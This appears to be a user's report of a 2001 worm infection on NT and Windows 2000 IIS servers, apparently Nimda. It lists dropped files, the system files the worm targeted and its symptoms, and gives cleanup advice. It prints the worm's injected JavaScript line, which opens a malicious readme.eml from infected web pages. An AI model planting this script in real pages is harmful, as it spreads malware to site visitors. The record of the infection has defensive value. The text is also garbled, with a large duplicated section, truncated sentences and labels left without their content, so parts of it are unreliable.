On NT SP4, IE crashes whenever I try to load it (Dr Watson is triggered). The same crash appears right after logging in as well. If I cancel Watson, IE will continue to run, but the system is very slow. IE also crashed on my Win 2k box, but it works now after I cleaned up some of the virus files.
- It seems the virus created these files, which I deleted:
WINNT\mmc.exe - 56 KB
(icon is the same as for IE html pages)
WINNT\Admin.dll - 56 KB
Admin.dll also showed up in a few IIS directories.
- The bogus mmc.exe process had a couple instances running when I first discovered the virus. I had to reboot to kill them. At the same time, netstat was reporting tons of connections to port 80 of various hosts as the virus tried to spread.
- Lots of mep* files found in the WINNT directory on my NT box. The.tmp files seem to contain the mime attachment data for readme.exe:
At one point I noticed one of the mep*.exe processes was running.
- On my Win2K box, these files appeared in hundreds of directories (fewer files found on my NT box - probably something to do with how my virtual IIS dirs are set up):
readme.eml
desktop.eml
sample.eml
desktop.nws (fewer of these than the others)
- A line of javascript code was appended to some of the html and asp files in my virtual IIS dirs:
Slashdot Mirror
- Windows File Protection errors:
... This file was restored to the original version to maintain system stability":
.tmp files seem to contain the mime attachment data for readme.exe:
.exe files contains the string:
At around the time the virus hit, Windows 2000 event log reported file replacement errors for these files:
"File replacement was attempted on the protected system file
d:\program files\microsoft frontpage\version3.0\bin\fp98swin.exe
d:\program files\common files\microsoft shared\web server extensions\40\bin\tcptest.exe
d:\program files\common files\microsoft shared\msinfo\msinfo32.exe
d:\program files\outlook express\wabmig.exe
d:\program files\outlook express\wab.exe
d:\program files\windows nt\pinball\pinball.exe
d:\winnt\system32\mspaint.exe
d:\program files\outlook express\msimn.exe
d:\program files\internet explorer\connection wizard\isignup.exe
d:\program files\internet explorer\connection wizard\inetwiz.exe
d:\winnt\system32\inetsrv\inetmgr.exe
d:\program files\internet explorer\connection wizard\icwconn2.exe
d:\program files\internet explorer\connection wizard\icwconn1.exe
d:\program files\windows nt\dialer.exe
d:\program files\netmeeting\conf.exe
d:\winnt\system32\cmmgr32.exe
The virus exe references this registry string, so I guess its possible this is where its grabbing some of these paths:
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
- IE crashing on NT:
On NT SP4, IE crashes whenever I try to load it (Dr Watson is triggered). The same crash appears right after logging in as well. If I cancel Watson, IE will continue to run, but the system is very slow. IE also crashed on my Win 2k box, but it works now after I cleaned up some of the virus files.
- It seems the virus created these files, which I deleted:
WINNT\mmc.exe - 56 KB
(icon is the same as for IE html pages)
WINNT\Admin.dll - 56 KB
Admin.dll also showed up in a few IIS directories.
- The bogus mmc.exe process had a couple instances running when I first discovered the virus. I had to reboot to kill them. At the same time, netstat was reporting tons of connections to port 80 of various hosts as the virus tried to spread.
- Lots of mep* files found in the WINNT directory on my NT box. The
mepDF.tmp - 78 KB
mepEO.tmp - 78 KB
mepE3.tmp - 78 KB
mep181.tmp - 78 KB
mep183.tmp - 78 KB
mepE2.tmp.exe - 56 KB
mepE4.tmp.exe - 56 KB
mepE5.tmp.exe = 56 KB
A few more similar looking files.
At one point I noticed one of the mep*.exe processes was running.
- On my Win2K box, these files appeared in hundreds of directories (fewer files found on my NT box - probably something to do with how my virtual IIS dirs are set up):
readme.eml
desktop.eml
sample.eml
desktop.nws (fewer of these than the others)
- A line of javascript code was appended to some of the html and asp files in my virtual IIS dirs:
<html><script language="JavaScript">window.open ("readme.eml", null, "resizable=no,top=6000,left=6000") </script></html>
- One of the virus
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
- My suggestion is to do a full search for any of these files and check them out. Note the modification dates.